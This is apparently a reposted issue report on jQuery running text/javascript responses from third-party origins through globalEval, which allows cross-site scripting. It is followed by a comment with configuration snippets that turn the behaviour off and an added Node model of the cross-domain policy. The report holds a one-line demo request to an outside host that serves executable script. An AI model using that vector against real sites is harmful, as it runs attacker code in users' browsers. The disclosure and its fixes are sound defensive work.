Inadequate/dangerous jQuery behavior for 3rd party text/javascript responses

Because of this

    jQuery.globalEval( text );

every text/javascript response gets executed. Even if we made a request to another service. CORS was created exactly to prevent this kind of behavior in JSONP (arbitrary code execution).

So when we do $.get('http://weather.com/sf-weather') or, like in Rails’ jquery_ujs, a form is being sent automatically, the attacker can respond to us with text/javascript and execute arbitrary code on our origin. Demo: $.get('http://sakurity.com/jqueryxss')

The fix is to not execute responses from 3rd party origins by default and make it an option. Don’t know who to cc to discuss it.

P.S. I would switch it off for same origin too, because using subtle redirect_to saving tricks we can redirect the user to a local JSONP endpoint and still get an XSS, but those are much more sophisticated vectors.

Author: Fantashit

2 thoughts on “Inadequate/dangerous jQuery behavior for 3rd party text/javascript responses”

  1. Everything about automated script detection is configurable so it’s pretty easy to disable it (untested examples that should work):

    // Good: disable javascript detection globally
    // (jQuery registers the text/javascript content sniff under `contents.script`,
    // so that is the key to switch off)
    $.ajaxSetup( {
        contents: {
            script: false
        }
    } );
    
    // Acceptable: disable text to javascript promotion (but will break intended manual conversions)
    // (the converter is registered as "text script"; a falsy value removes it,
    // so such a response ends in a parsererror instead of being evaluated)
    $.ajaxSetup( {
        converters: {
            "text script": false
        }
    } );
    
    // Preferred: use a prefilter to be more specific (only crossDomain)
    // (`s` is the per-request settings copy, so the global defaults are untouched)
    $.ajaxPrefilter( function( s ) {
        if ( s.crossDomain ) {
            s.contents.script = false;
        }
    } );

    Not a fan of changing the behaviour within the lib but I can understand the rationale (though I’d recommend just removing the javascript dataType detection in the default options then).
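The following is an added example, not code from the thread or from jQuery. It is a stand-alone Node model of how a jQuery-style client picks a dataType from the response Content-Type and why the crossDomain-only prefilter above keeps a third-party text/javascript body out of the evaluator. The `DEFAULT_CONTENTS` table and the first-match loop mirror the shape of jQuery's `contents` handling (an assumption about its behaviour, not jQuery's own source); the page origin, request URLs and response bodies are all constructed for the demo.

```javascript
// Added example (not from the thread, not jQuery code): model of Content-Type
// based dataType detection plus the crossDomain-only hardening policy.
// The table below is an assumption that mirrors jQuery's default `contents`
// entries in shape; all URLs and bodies are constructed for the demo.

// Ordered like jQuery's defaults: the first regex matching the Content-Type wins.
const DEFAULT_CONTENTS = {
  xml: /\bxml\b/,
  html: /\bhtml/,
  json: /\bjson\b/,
  script: /\b(?:java|ecma)script\b/,
};

// crossDomain check: scheme, host and port of the request must equal the page's.
// URL.origin normalises default ports, so "https://app.example:443" is same-origin.
function isCrossDomain(pageOrigin, requestUrl) {
  const page = new URL(pageOrigin);
  const target = new URL(requestUrl, pageOrigin); // relative URLs resolve to the page
  return page.origin !== target.origin;
}

// The prefilter policy from the comment: for cross-origin requests, switch the
// "script" sniff off on a per-request copy so the global defaults stay untouched.
function effectiveContents(pageOrigin, requestUrl, contents = DEFAULT_CONTENTS) {
  const perRequest = { ...contents };
  if (isCrossDomain(pageOrigin, requestUrl)) {
    perRequest.script = false;
  }
  return perRequest;
}

// Detection loop: falsy entries are skipped, which is what `contents.script = false`
// relies on. No match means the body is handed back as plain text.
function detectDataType(contentType, contents) {
  for (const [type, re] of Object.entries(contents)) {
    if (re && re.test(contentType)) {
      return type;
    }
  }
  return "text";
}

// Simulated completion of a request. Only the "script" dataType reaches the
// evaluator; every other type is returned to the caller as data.
function handleResponse(pageOrigin, requestUrl, contentType, body, evaluate) {
  const dataType = detectDataType(contentType, effectiveContents(pageOrigin, requestUrl));
  if (dataType === "script") {
    evaluate(body);
    return { dataType, evaluated: true };
  }
  return { dataType, evaluated: false, data: body };
}

// Demo: a third-party host answers a plain GET with text/javascript (the case
// from the original post), a same-origin asset is still promoted, and a
// cross-origin JSON API is unaffected by the policy.
function demo() {
  const pageOrigin = "https://app.example"; // constructed page origin
  const evaluated = [];
  const evaluate = (code) => evaluated.push(code); // stands in for globalEval

  const thirdParty = handleResponse(
    pageOrigin,
    "http://third-party.example/sf-weather",
    "text/javascript; charset=utf-8",
    "/* constructed body */ alert(1)",
    evaluate
  );
  const sameOrigin = handleResponse(
    pageOrigin,
    "/assets/widget.js",
    "application/javascript",
    "/* constructed body */ window.widgetLoaded = true;",
    evaluate
  );
  const jsonApi = handleResponse(
    pageOrigin,
    "https://api.third-party.example/weather",
    "application/json",
    '{"temp": 61}',
    evaluate
  );
  return { thirdParty, sameOrigin, jsonApi, evaluatedCount: evaluated.length };
}

console.log(JSON.stringify(demo(), null, 2));
```

With the policy in place the third-party response comes back as `dataType: "text"` with the body as a string, while the same-origin script is still evaluated, matching the original post's proposal of changing only the third-party default. Covering the same-origin redirect case from the P.S. would mean the global `script: false` setting instead, which is the first snippet in the comment above.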
